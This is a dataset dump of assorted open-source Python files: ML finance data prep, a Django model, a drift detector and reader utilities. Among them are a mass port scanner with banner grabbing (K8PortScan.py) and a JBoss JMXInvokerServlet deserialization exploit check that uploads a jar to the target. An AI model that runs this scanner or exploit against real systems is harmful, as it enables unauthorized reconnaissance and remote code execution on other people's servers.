max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars) |
---|---|---|---|---|
Chapter06/6B_TrendFollowings/6B_1_trendFollowing.py | uyenphuong18406/Hands-On-Artificial-Intelligence-for-Banking | 115 | 12728009 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>'
"""
Created on Thu Oct 25 23:19:44 2018
@author: jeff
"""
'''*************************************
#1. Import libraries and key variable values
'''
import quandl
import plotly
import plotly.graph_objs as go
import numpy as np
from datetime import datetime
try:
import Image
except ImportError:
from PIL import Image
import os
import h5py
#dates parameters
str_dte = '2003-01-01'
end_dte = '2018-7-31'
date_dict = {'gte':str_dte, 'lte':end_dte}
#quandl setting
quandl.ApiConfig.api_key = QUANDLKEY
col_num_mid = 10
col_num_dte = 9
#parameters for the image generation
pixel_size = 100
window_size = 60
pred_window_size = 1
num_channel = 1
#create path for the output dataset
folder_path = os.path.dirname(__file__)
data_X_dir = os.path.join(folder_path,'dataset')
data_Y_dir = os.path.join(folder_path,'dataset')
#ticker lists
#tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB']
tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK']
#generate a png file for each input window or not
img_output =False
#generate an interactive plot of the ticker's stock price or not
gen_plot = False
'''*************************************
#2. Define the function to rescale the stock price according to the min and max values
'''
#input_X is a series of prices
#output_X is the same series expressed in pixel units
def rescale(input_X, pixel, min_x,max_x):
unit = (max_x - min_x)/pixel
output_X = round((input_X-min_x)/unit,0)
return output_X,unit
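#illustrative sketch (not part of the original script): with pixel=100,
#min_x=10.0 and max_x=20.0 the unit is 0.1, so a mid price of 15.0 maps to
#pixel row 50 and 20.0 maps to row 100, e.g.
#    rows, unit = rescale(df_plot['mid'], pixel_size, min_p, max_p)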
'''*************************************
#3. Go through the tickers
'''
for tkr in tkr_list:
print(tkr)
#if the ticker has already been downloaded, skip it and go on to the next one
if os.path.exists(tkr+'6b1_completed.txt'):
continue
#download and create dataset
df =quandl.get_table('SHARADAR/SFP',date=date_dict,ticker=tkr)
#sort the rows by date in ascending order
df = df.sort_values(by=['date'])
df=df.reset_index(drop=True)
#plot an interactive candlestick chart for viewing the data
if gen_plot == True:
trace = go.Candlestick(x=df.date,
open=df.open,
high=df.high,
low=df.low,
close=df.close)
data = [trace]
plotly.offline.plot(data, filename=tkr+'simple_candlestick')
#calculate mid price of the day
df['mid'] = (df['high'] + df['low'])/2
len_df = len(df)
num_img = max(int(len_df-window_size-1),0)
current_min_dte = df.date
train_shape = (num_img, pixel_size, window_size,num_channel)
label_shape = (num_img, pixel_size)
#remove the file if there is one
data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5')
try:
os.remove(data_X_path)
except OSError:
pass
h5f_X = h5py.File(data_X_path,'w')
#remove the file if there is one
data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5')
try:
os.remove(data_Y_path)
except OSError:
pass
h5f_Y = h5py.File(data_Y_path,'w')
#create dataset within the HDF5 file
#now we create the dataset with a fixed size to fit all the data; it could also be created to fit fixed batches
h5f_X.create_dataset("X_img_ds", train_shape, np.float32)
h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32)
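    #shape note: X_img_ds holds one image per sliding window,
    #(num_img, pixel_size, window_size, num_channel) = (num_img, 100, 60, 1),
    #and Y_label_ds holds one one-hot row of length pixel_size (100) per window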
#loop through the dates
for i in range(num_img):
img_ar = np.zeros((pixel_size,window_size,1))
result_Y =np.zeros((pixel_size))
df_plot = df.iloc[i:window_size+i,:]
#create min and max values for the mid price plot within a given timeframe
min_p = min(df_plot['mid'])
max_p = max(df_plot['mid'])
output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p)
df_next = df.iloc[window_size+i+1,:]
next_p = df_next['mid']
unit = max(unit,0.000001)
next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0)
#in case of a low-liquidity ETF whose price never changes in the window, no graph will be drawn
if min_p ==max_p:
continue
k = 0
#draw the dot on the x, y axis of the input image array
for pix in output_pixel:
img_ar[int(pix)-1][k][0] = 255
k+=1
#output the image for visualization
if img_output:
img = Image.fromarray(img_ar)
if img.mode != 'RGB':
new_img = img.convert('RGB')
file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png')
new_img.save(file_path,"PNG")
img_row = img_ar/255
#draw the dot on the target image for training
result_Y[int(next_p_val)-1] = 255
result_Y_row=result_Y/255
#stack up into a numpy array for image recognition
h5f_X["X_img_ds"][i, ...] = img_row
h5f_Y["Y_label_ds"][i, ...] = result_Y_row
if i == 0:
np_X = img_row
np_Y = result_Y_row
else:
np_X = np.vstack((np_X,img_row))
np_Y = np.vstack((np_Y,result_Y_row))
f_tkr=open(tkr+'6b1_completed.txt','w+')
f_tkr.close()
h5f_X.close()
h5f_Y.close()
#write a marker file to the directory to signal the completion of this task
f=open('6b1_completed.txt','w+')
f.close()
|
example/books/models.py | spapas/django-generic-scaffold | 106 | 12728048 | from __future__ import unicode_literals
try:
from django.core.urlresolvers import reverse
except ModuleNotFoundError:
from django.urls import reverse
from django.db import models
import generic_scaffold
class Book(models.Model):
title = models.CharField(max_length=128)
author = models.CharField(max_length=128)
category = models.CharField(max_length=32)
def get_absolute_url(self):
return reverse(self.detail_url_name, args=[self.id])
def __str__(self):
return '{0} {1} {2}'.format(self.title, self.author, self.category)
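    # Illustrative usage sketch (not part of the original file); the values are
    # made-up examples and assume the app is installed and migrated:
    #   book = Book.objects.create(title='Dune', author='Frank Herbert', category='sci-fi')
    #   str(book)   # -> 'Dune Frank Herbert sci-fi'
    # get_absolute_url() relies on detail_url_name, which the generic_scaffold
    # registration is expected to attach to the model class.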
|
asterocr/text_rec/loss/__init__.py | ankur6ue/aster-ocr | 605 | 12728061 | from __future__ import absolute_import
from .sequenceCrossEntropyLoss import SequenceCrossEntropyLoss
__all__ = [
'SequenceCrossEntropyLoss',
] |
src/sage/crypto/mq/sbox.py | bopopescu/sage | 1,742 | 12728063 | <filename>src/sage/crypto/mq/sbox.py
from sage.misc.lazy_import import lazy_import
lazy_import('sage.crypto.sbox', ['SBox',
'feistel_construction',
'misty_construction'],
deprecation=22986)
|
K8PortScan.py | VCStardust/K8tools | 4,611 | 12728081 | import socket, sys
import threading
import argparse
import time
##Code: https://github.com/k8gege/K8PortScan
##K8portScan 1.0
##Date: 20190530
##Author: K8gege
##Usage:
##IP (IP IP/24 IP/16 IP/8)
##
##python K8PortScan.py -ip 172.16.17.32
##python K8PortScan.py -ip 172.16.17.32 -p 80-89
##python K8PortScan.py -ip 172.16.17.32/24 -p 80,445,3306
##
##IPlist (ip.txt ip24.txt ip16.txt ip8.txt)
##python K8PortScan.py -f ip.txt
##python K8PortScan.py -f ip.txt -p 80-89
##python K8PortScan.py -f ip24.txt -p 80,445,3306
def getPortBanner(ip, p):
try:
port=int(p)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if port==3306 or port==22 or port==23 or port==1521:
s.settimeout(5)
else:
s.settimeout(0.2)
s.connect((ip, port))
s.send('HELLO\r\n')
#print ip+"\t"+p+" Open"
print ip+"\t"+p+" Open\t"+s.recv(1024).split('\r\n')[0].strip('\r\n')
except Exception as e:
#print e
pass
finally:
s.close()
def GetPortsBanner(ip,ports):
for p in ports:
#print p
banner=getPortBanner(ip,str(p))
# if banner!=None:
# print ip+"\t"+banner
def CscanPortBanner(ip,ports):
if '/24' in ip:
print 'ip/24: '+ip
ipc = (ip.split('.')[:-1])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i))
threading._start_new_thread(GetPortsBanner,(ip,ports,))
time.sleep(0.1)
else:
GetPortsBanner(ip,ports)
def BscanPortBanner(ip,ports):
if '/16' in ip:
print 'ip/16: '+ip
ipc = (ip.split('.')[:-2])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i)+'.0/24')
CscanPortBanner(ip,ports)
def AscanPortBanner(ip,ports):
if '/8' in ip:
print 'ip/8: '+ip
ipc = (ip.split('.')[:-3])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i)+'.0/16')
BscanPortBanner(ip,ports)
if __name__ == '__main__':
print('K8PortScan 1.0')
parser = argparse.ArgumentParser()
parser.add_argument('-ip',help='IP or IP/24')
parser.add_argument('-f', dest="ip_file", help="ip.txt ip24.txt ip16.txt ip8.txt")
parser.add_argument('-p', dest='port', type=str, help="Example: 80 80-89 80,443,3306,8080")
args = parser.parse_args()
ip=args.ip
tmpPorts = args.port
ipfile=args.ip_file
if ip==None and ipfile==None:
print 'Error: ip or ipfile is Null!'
print 'Help: -h or --help'
sys.exit(1)
if tmpPorts:
if ',' in tmpPorts:
ports = tmpPorts.split(',')
elif '-' in tmpPorts:
ports = tmpPorts.split('-')
tmpports = []
[tmpports.append(i) for i in range(int(ports[0]), int(ports[1]) + 1)]
ports = tmpports
else:
ports = [tmpPorts]
else:
print 'Default Ports'
ports = [21, 22, 23, 53, 80, 111, 139, 161, 389, 443, 445, 512, 513, 514,
873, 1025, 1433, 1521, 3128, 3306, 3311, 3312, 3389, 5432, 5900,
5984, 6082, 6379, 7001, 7002, 8000, 8080, 8081, 8090, 9000, 9090,
8888, 9200, 9300, 10000, 11211, 27017, 27018, 50000, 50030, 50070]
if ipfile!=None:
iplist = []
with open(str(ipfile)) as f:
while True:
line = str(f.readline()).strip()
if line:
iplist.append(line)
else:
break
if ipfile=='ip24.txt':
print 'Scan iplist/24'
for ip in iplist:
CscanPortBanner(ip+'/24',ports)
elif ipfile=='ip16.txt':
print 'Scan iplist/16'
for ip in iplist:
BscanPortBanner(ip+'/16',ports)
elif ipfile=='ip8.txt':
print 'Scan iplist/8'
for ip in iplist:
AscanPortBanner(ip+'/8',ports)
# elif ipfile=='ip.txt':
# print 'iplist'
else:
print 'Scan iplist (any txt file)'
for ip in iplist:
CscanPortBanner(ip,ports)
elif ip!=None:
if '/16' in ip:
BscanPortBanner(ip,ports)
elif '/8' in ip:
AscanPortBanner(ip,ports)
elif '/24' in ip:
CscanPortBanner(ip,ports)
else:
CscanPortBanner(ip,ports)
|
middileware/jboss/jboss_unrce.py | xin053/PocCollect | 340 | 12728107 | <filename>middileware/jboss/jboss_unrce.py
#coding:utf-8
import urllib2
import binascii
import time
from t import T
def readfile(path):
data=None
file_object = open(path,'rb')
try:
data = file_object.read( )
finally:
file_object.close( )
return data
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
target_url = 'http://'+ip+':'+port
result = {}
result['result']=False
res=None
vul_url = target_url+"/invoker/JMXInvokerServlet"
import os
upload_jar = readfile(os.path.split(os.path.realpath(__file__))[0]+'/upload.jar')
vul_test=readfile(os.path.split(os.path.realpath(__file__))[0]+'/vultest.dat')
try:
urllib2.urlopen(vul_url,upload_jar)
res = urllib2.urlopen(vul_url,vul_test)
if 'vultest11111' in res.read():
info= vul_url +" Jboss Unserialization vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='Jboss Unserialization vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=vul_url
result['VerifyInfo']['result'] =info
return result
except Exception,e:
return result
finally:
if res is not None:
res.close()
del upload_jar
del vul_test
if __name__ == '__main__':
print P().verify(ip='172.16.58.3',port='8080') |
torchdrift/detectors/partial_mmd.py | TorchDrift/TorchDrift | 200 | 12728129 | <gh_stars>100-1000
from typing import Optional
import torch
from .mmd import GaussianKernel
from .detector import Detector
import torchdrift
import warnings
def partial_kernel_mmd_twostage(x, y, n_perm=None,
kernel=GaussianKernel(),
fraction_to_match=1.0, wasserstein_p=2.0):
"""Partial kernel MMD using a Wasserstein coupling to obtain the weight for the reference.
"""
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
n, d = x.shape
m, d2 = y.shape
if fraction_to_match < 1.0:
_, coupling = torchdrift.detectors.wasserstein(
x, y,
fraction_to_match=fraction_to_match, return_coupling=True, n_perm=None,
p=wasserstein_p)
w = coupling[:, :-1].sum(1).to(device=x.device, dtype=x.dtype) / fraction_to_match
else:
w = torch.full((n,), 1.0 / n, device=x.device, dtype=x.dtype)
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
# we are a bit sloppy here as we just keep the diagonal and everything twice
k = kernel(dists)
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
# The diagonals are always 1 (up to numerical error, this is (3) in Gretton et al.)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
return mmd
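# Illustrative usage sketch (not part of the original module); shapes and the
# shift are arbitrary examples, inputs are double precision as recommended below:
#   x = torch.randn(200, 16, dtype=torch.double)         # reference sample
#   y = torch.randn(80, 16, dtype=torch.double) + 0.25   # (possibly shifted) test sample
#   stat = partial_kernel_mmd_twostage(x, y, fraction_to_match=0.8)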
def partial_kernel_mmd_qp(x, y, n_perm=None, kernel=GaussianKernel(),
fraction_to_match=1.0):
"""Partial Kernel MMD using quadratic programming.
This is very slow and mainly intended for reference purposes.
You need to install qpsolvers to use this function."""
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
import qpsolvers
n, d = x.shape
m, d2 = y.shape
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
# we are a bit sloppy here as we just keep the diagonal and everything twice
k = kernel(dists.double())
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
v = torch.full((m,), 1 / m, dtype=k_y.dtype, device=k_y.device)
R = torch.cholesky(k_x, upper=True)
d = torch.inverse(R.t()) @ (k_xy.sum(1) / m)
lb = torch.zeros((n,), dtype=k_x.dtype, device=k_x.device)
ub = torch.full((n,), 1.0 / (n * fraction_to_match), dtype=k_x.dtype, device=k_x.device)
w = qpsolvers.solve_ls(R.cpu().numpy(), d.cpu().numpy(),
lb=lb.cpu().numpy(), ub=ub.cpu().numpy(),
A=torch.ones((1, n,), dtype=R.dtype).numpy(),
b=torch.ones((1,), dtype=R.dtype).numpy())
torchdrift.utils.check(
w is not None,
'QP failed to find a solution (numerical accuracy with the bounds?)'
)
w = torch.as_tensor(w, device=k_x.device, dtype=k_x.dtype)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
return mmd
def partial_kernel_mmd_approx(
x, y,
fraction_to_match=1.0,
kernel=GaussianKernel(),
n_perm=None):
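    """Approximate partial kernel MMD.

    Heuristically refines the reference weights with a few projected Newton and
    projected gradient steps, clamping them to [0, 1/(n * fraction_to_match)];
    faster than the QP variant above but approximate.
    """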
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
rng = torch.Generator(device=x.device).manual_seed(1234)
n, d = x.shape
m, d2 = y.shape
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
k = kernel(dists.double())
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
w = torch.full((n,), 1.0 / n, dtype=k_x.dtype, device=k_x.device, requires_grad=False)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
for i in range(100):
r = torch.rand((), device=x.device, dtype=x.dtype, generator=rng) + 0.5
grad_mmd = (k_x @ w) - (k_xy).mean(1)
grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))]
if grad_mmd_min.size(0) > 0:
grad_mmd_min = grad_mmd_min.min()
else:
grad_mmd_min = torch.zeros_like(r)
grad_mmd_max = grad_mmd[(w > 0)]
if grad_mmd_max.size(0) > 0:
grad_mmd_max = grad_mmd_max.max()
else: # pragma: no cover
grad_mmd_max = torch.zeros_like(r)
active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r))
& ((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r)))
H_mmd_active = k_x[active_mask][:, active_mask]
if H_mmd_active.size(0) == 0:
continue
u = torch.cholesky(H_mmd_active)
Hinvgr = torch.cholesky_solve(grad_mmd[active_mask][:, None], u).squeeze(1)
w_active = w[active_mask]
Hinvgr -= Hinvgr.mean()
Hinvgr_full = torch.zeros_like(w)
Hinvgr_full[active_mask] = Hinvgr
step = 1.0
for j in range(5):
w_cand = w.clone()
w_cand -= step * Hinvgr_full
w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match))
w_cand /= w_cand.sum()
mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m
is_lower = (mmd_cand < mmd)
mmd = torch.where(is_lower, mmd_cand, mmd)
w = torch.where(is_lower, w_cand, w)
step /= 5
grad_mmd = 2 * (k_x @ w) - 2 * (k_xy).mean(1)
grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))]
if grad_mmd_min.size(0) > 0:
grad_mmd_min = grad_mmd_min.min()
else:
grad_mmd_min = torch.zeros_like(r)
grad_mmd_max = grad_mmd[(w > 0)]
if grad_mmd_max.size(0) > 0:
grad_mmd_max = grad_mmd_max.max()
else: # pragma: no cover
grad_mmd_max = torch.zeros_like(r)
active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r)) &
((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r)))
step = 1e-1
for j in range(5):
w_cand = w.clone()
grad_mmd_x = grad_mmd.clone()
grad_mmd_x = torch.where(active_mask,
grad_mmd_x,
torch.zeros((), device=grad_mmd_x.device,
dtype=grad_mmd_x.dtype))
grad_mmd_x = torch.where(active_mask,
grad_mmd_x,
grad_mmd_x - grad_mmd_x.mean())
w_cand -= step * grad_mmd_x
w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match))
w_cand /= w_cand.sum()
mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m
is_lower = (mmd_cand < mmd)
mmd = torch.where(is_lower, mmd_cand, mmd)
w = torch.where(is_lower, w_cand, w)
step = step / 5
return mmd
class PartialKernelMMDDriftDetector(Detector):
"""Drift detector based on the partial MMD Distance.
(see <NAME>: Partial Wasserstein and Maximum Mean Discrepancy distances
for bridging the gap between outlier detection and drift detection,
https://arxiv.org/abs/2106.01289 )
Note: We recommend using dtype double as input for now.
Args:
fraction_to_match: fraction of x probability mass to be matched
n_perm: number of bootstrap permutations to run to compute p-value (None for not returning a p-value)
method: PartialKernelMMDDriftDetector.METHOD_TWOSTAGE, METHOD_APPROX, or METHOD_QP
"""
METHOD_TWOSTAGE = 1
METHOD_APPROX = 2
METHOD_QP = 3
def __init__(
self, *, return_p_value=False, n_perm=1000, fraction_to_match=1.0,
kernel=GaussianKernel(),
method=METHOD_TWOSTAGE,
):
super().__init__(return_p_value=return_p_value)
self.fraction_to_match = fraction_to_match
self.kernel = kernel
self.n_perm = n_perm
self.n_test = None
self.scores = None
if method == PartialKernelMMDDriftDetector.METHOD_TWOSTAGE:
self.partial_mmd = partial_kernel_mmd_twostage
elif method == PartialKernelMMDDriftDetector.METHOD_APPROX:
self.partial_mmd = partial_kernel_mmd_approx
elif method == PartialKernelMMDDriftDetector.METHOD_QP:
self.partial_mmd = partial_kernel_mmd_qp
else: # pragma: no cover
raise RuntimeError("Invalid Partial MMD method")
def fit(self, x: torch.Tensor, n_test: Optional[int] = None):
"""Record a sample as the reference distribution
Args:
x: The reference data
n_test: If an int is specified, the last n_test datapoints
will not be considered part of the reference data. Instead,
bootstrappin using permutations will be used to determine
the distribution under the null hypothesis at fit time.
Future testing must then always be done with n_test elements
to get p-values.
"""
x = x.detach()
if n_test is None:
self.base_outputs = x
else:
torchdrift.utils.check(0 < n_test < x.size(0), "n_test must be strictly between 0 and the number of samples")
self.n_test = n_test
self.base_outputs = x[:-n_test]
n_ref = x.size(0) - n_test
with_distant_point = self.fraction_to_match < 1.0
scores = []
for i in range(self.n_perm):
slicing = torch.randperm(x.size(0))
scores.append(self.partial_mmd(x[slicing[:-n_test]], x[slicing[-n_test:]], fraction_to_match=self.fraction_to_match, kernel=self.kernel))
scores = torch.stack(scores)
self.scores = scores
self.dist_min = scores.min().double()
mean = scores.mean() - self.dist_min
var = scores.var().double()
self.dist_alpha = mean**2 / var
self.dist_beta = mean / var
self.scores = scores
return x
def predict_shift_from_features(
self,
base_outputs: torch.Tensor,
outputs: torch.Tensor,
compute_score: bool,
compute_p_value: bool,
individual_samples: bool = False,
):
torchdrift.utils.check(
not individual_samples, "Individual samples not supported by the partial MMD detector"
)
if not compute_p_value:
ood_score = self.partial_mmd(
base_outputs, outputs, fraction_to_match=self.fraction_to_match,
n_perm=None,
)
p_value = None
else:
torchdrift.utils.check(
self.n_test is not None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
torchdrift.utils.check(self.n_test == outputs.size(0),
"number of test samples does not match calibrated number")
ood_score = self.partial_mmd(
base_outputs, outputs, fraction_to_match=self.fraction_to_match,
n_perm=None)
p_value = torch.igammac(self.dist_alpha, self.dist_beta * (ood_score - self.dist_min).clamp_(min=0)) # needs PyTorch >=1.8
# z = (ood_score - self.dist_mean) / self.dist_std
# p_value = 0.5 * torch.erfc(z * (0.5**0.5))
# p_value = (self.scores > ood_score).float().mean()
return ood_score, p_value
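# Illustrative usage sketch (not part of the original module); tensor names and
# sizes are arbitrary examples, and only methods defined in this class are used:
#   detector = PartialKernelMMDDriftDetector(fraction_to_match=0.8, n_perm=500)
#   detector.fit(ref_features, n_test=50)   # calibrates the null distribution by permutation
#   score, p_value = detector.predict_shift_from_features(
#       detector.base_outputs, test_features,   # test_features must have 50 rows here
#       compute_score=True, compute_p_value=True)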
|
plotdevice/util/readers.py | plotdevice/plotdevice | 110 | 12728133 | <filename>plotdevice/util/readers.py
# encoding: utf-8
import os, sys, re
from operator import attrgetter
PY2 = sys.version_info[0] == 2
# files & io
from io import open, StringIO, BytesIO
from os.path import abspath, dirname, exists, join, splitext
from plotdevice import DeviceError, INTERNAL
text_type = str if not PY2 else unicode
# data formats
import json, csv
from collections import namedtuple, defaultdict
from codecs import iterencode, iterdecode
from xml.parsers import expat
# http
from urlparse import urlparse
from Foundation import NSDateFormatter, NSLocale, NSTimeZone, NSDate
### XML handling ###
Element = namedtuple('Element', ['tag', 'attrs', 'parents', 'start', 'end'])
escapes = [('break','0C'), ('indent', '09'), ('flush', '08')]
doctype = '<!DOCTYPE plod [ %s ]>' % "".join(['<!ENTITY %s "&#xE0%s;" >'%e for e in escapes])
HEAD = u"%s<%s>" % (doctype, INTERNAL)
TAIL = u"</%s>" % INTERNAL
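# The entities above shift the tty escape characters used for break/indent/flush
# (form feed 0x0C, tab 0x09, backspace 0x08) into the Unicode Private Use Area
# (U+E00C/U+E009/U+E008) so they survive XML parsing; XMLParser.text translates
# them back once parsing is done.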
class XMLParser(object):
_log = 0
def __init__(self, txt, offset=0):
# configure the parsing machinery/callbacks
p = expat.ParserCreate()
p.StartElementHandler = self._enter
p.EndElementHandler = self._leave
p.CharacterDataHandler = self._chars
self._expat = p
# shift the range values in .nodes by offset (in case we're appending)
self._offset = offset
# set up state attrs to record the parse results
self.stack = []
self.cursor = offset
self.regions = defaultdict(list)
self.nodes = defaultdict(list)
self.body = []
# wrap everything in a root node (and include the whitespace entities which shift
# the tty escapes into the unicode PUA for the duration)
if isinstance(txt, text_type):
txt = txt.encode('utf-8')
self._xml = HEAD.encode('utf-8') + txt + TAIL.encode('utf-8')
# parse the input xml string
try:
self._expat.Parse(self._xml, True)
except expat.ExpatError, e:
self._expat_error(e)
@property
def text(self):
# returns the processed string (with all markup removed and tty-escapes un-shifted)
return u"".join(self.body).translate({0xE000+v:v for v in (8,9,12)})
def _expat_error(self, e):
# correct the column and line-string for our wrapper element
col = e.offset
err = u"\n".join(e.args)
line = self._xml.decode('utf-8').split("\n")[e.lineno-1]
if line.startswith(HEAD):
line = line[len(HEAD):]
col -= len(HEAD)
err = re.sub(ur'column \d+', 'column %i'%col, err)
if line.endswith(TAIL):
line = line[:-len(TAIL)]
# move the column range with the typo into `measure` chars
measure = 80
snippet = line
if col>measure:
snippet = snippet[col-measure:]
col -= col-measure
snippet = snippet[:max(col+12, measure-col)]
col = min(col, len(snippet))
# show which ends of the line are truncated
clipped = [snippet]
if not line.endswith(snippet):
clipped.append(u'...')
if not line.startswith(snippet):
clipped.insert(0, u'...')
col+=3
caret = u' '*(col-1) + u'^'
# raise the exception
msg = u'Text: ' + err
stack = u'stack: ' + u" ".join(['<%s>'%elt.tag for elt in self.stack[1:]]) + u' ...'
xmlfail = u"\n".join([msg, u"".join(clipped), caret, stack])
raise DeviceError(xmlfail)
def log(self, s=None, indent=0):
if not isinstance(s, basestring):
if s is None:
return self._log
self._log = int(s)
return
if not self._log: return
if indent<0: self._log-=1
msg = (u' '*self._log)+(s if s.startswith('<') else repr(s)[1:])
print msg.encode('utf-8')
if indent>0: self._log+=1
def _enter(self, name, attrs):
parents = tuple(reversed([e.tag for e in self.stack[1:]]))
elt = Element(name, attrs, parents, self.cursor, end=None)
self.stack.append(elt)
self.log(u'<%s>'%(name), indent=1)
def _chars(self, data):
selector = tuple([e.tag for e in self.stack])
# handle special case where a self-closed tag precedes a '\n'
if hasattr(self, '_crlf'):
if data == "\n":
selector = selector + (self._crlf.tag,)
del self._crlf
self.regions[selector].append(tuple([self.cursor-self._offset, len(data)]))
self.cursor += len(data)
self.body.append(data)
self.log(data)
def _leave(self, name):
node = self.stack.pop()._replace(end=self.cursor)
# hang onto line-ending self-closed tags so they can be applied to the next '\n' in _chars
if node.start==node.end:
at = self._expat.CurrentByteIndex
if self._xml[at-2:at]=='/>' and self._xml[at:at+1]=="\n":
node = node._replace(end=node.start+1)
self._crlf = node
self.nodes[name].append(node)
self.log(u'</%s>'%(name), indent=-1)
# if we've exited the root node, clean up the parsed elements
if name == INTERNAL:
del self.nodes[INTERNAL]
self.nodes = {tag:sorted(elts, key=attrgetter('start')) for tag,elts in self.nodes.items()}
### CSV unpacking ###
def csv_rows(file_obj, dialect=csv.excel, **kwargs):
csvfile = iterencode(file_obj, 'utf-8') if PY2 else file_obj
csvreader = csv.reader(csvfile, dialect=dialect, **kwargs)
csvreader = (list(iterdecode(i, 'utf-8')) for i in csvreader) if PY2 else csvreader
for row in csvreader:
yield row
def csv_dict(file_obj, dialect=csv.excel, cols=None, dict=dict, **kwargs):
if not isinstance(cols, (list, tuple)):
cols=None
for row in csv_rows(file_obj, dialect, **kwargs):
if not cols:
cols = row
continue
yield dict(zip(cols,row))
def csv_tuple(file_obj, dialect=csv.excel, cols=None, **kwargs):
if not isinstance(cols, (list, tuple)):
cols=None
elif cols:
RowType = namedtuple('Row', cols)
for row in csv_rows(file_obj, dialect, **kwargs):
if not cols:
cols = row
RowType = namedtuple('Row', cols)
continue
yield RowType(**dict(zip(cols, row)))
def csv_dialect(fd):
snippet = fd.read(1024).encode('utf-8') if PY2 else fd.read(1024)
fd.seek(0)
return csv.Sniffer().sniff(snippet)
### HTTP utils ###
try:
import requests
from cachecontrol import CacheControl, CacheControlAdapter
from cachecontrol.caches import FileCache
from cachecontrol.heuristics import LastModified
cache_dir = '%s/Library/Caches/PlotDevice'%os.environ['HOME']
HTTP = CacheControl(requests.Session(), cache=FileCache(cache_dir), heuristic=LastModified())
except ImportError:
class Decoy(object):
def get(self, url):
unsupported = 'could not find the "requests" library (try running "python setup.py build" first)'
raise RuntimeError(unsupported)
HTTP = Decoy()
def binaryish(content, format):
bin_types = ('pdf','eps','png','jpg','jpeg','gif','tiff','tif','zip','tar','gz')
bin_formats = ('raw','bytes','img','image')
if any(b in content for b in bin_types):
return True
if format:
return any(b in format for b in bin_types+bin_formats)
return False
_nsdf = NSDateFormatter.alloc().init()
_nsdf.setLocale_(NSLocale.alloc().initWithLocaleIdentifier_("en_US_POSIX"))
_nsdf.setDateFormat_("EEE',' dd' 'MMM' 'yyyy HH':'mm':'ss zzz")
_nsdf.setTimeZone_(NSTimeZone.timeZoneForSecondsFromGMT_(0))
def last_modified(resp):
"""Return the last modified date as a unix time_t"""
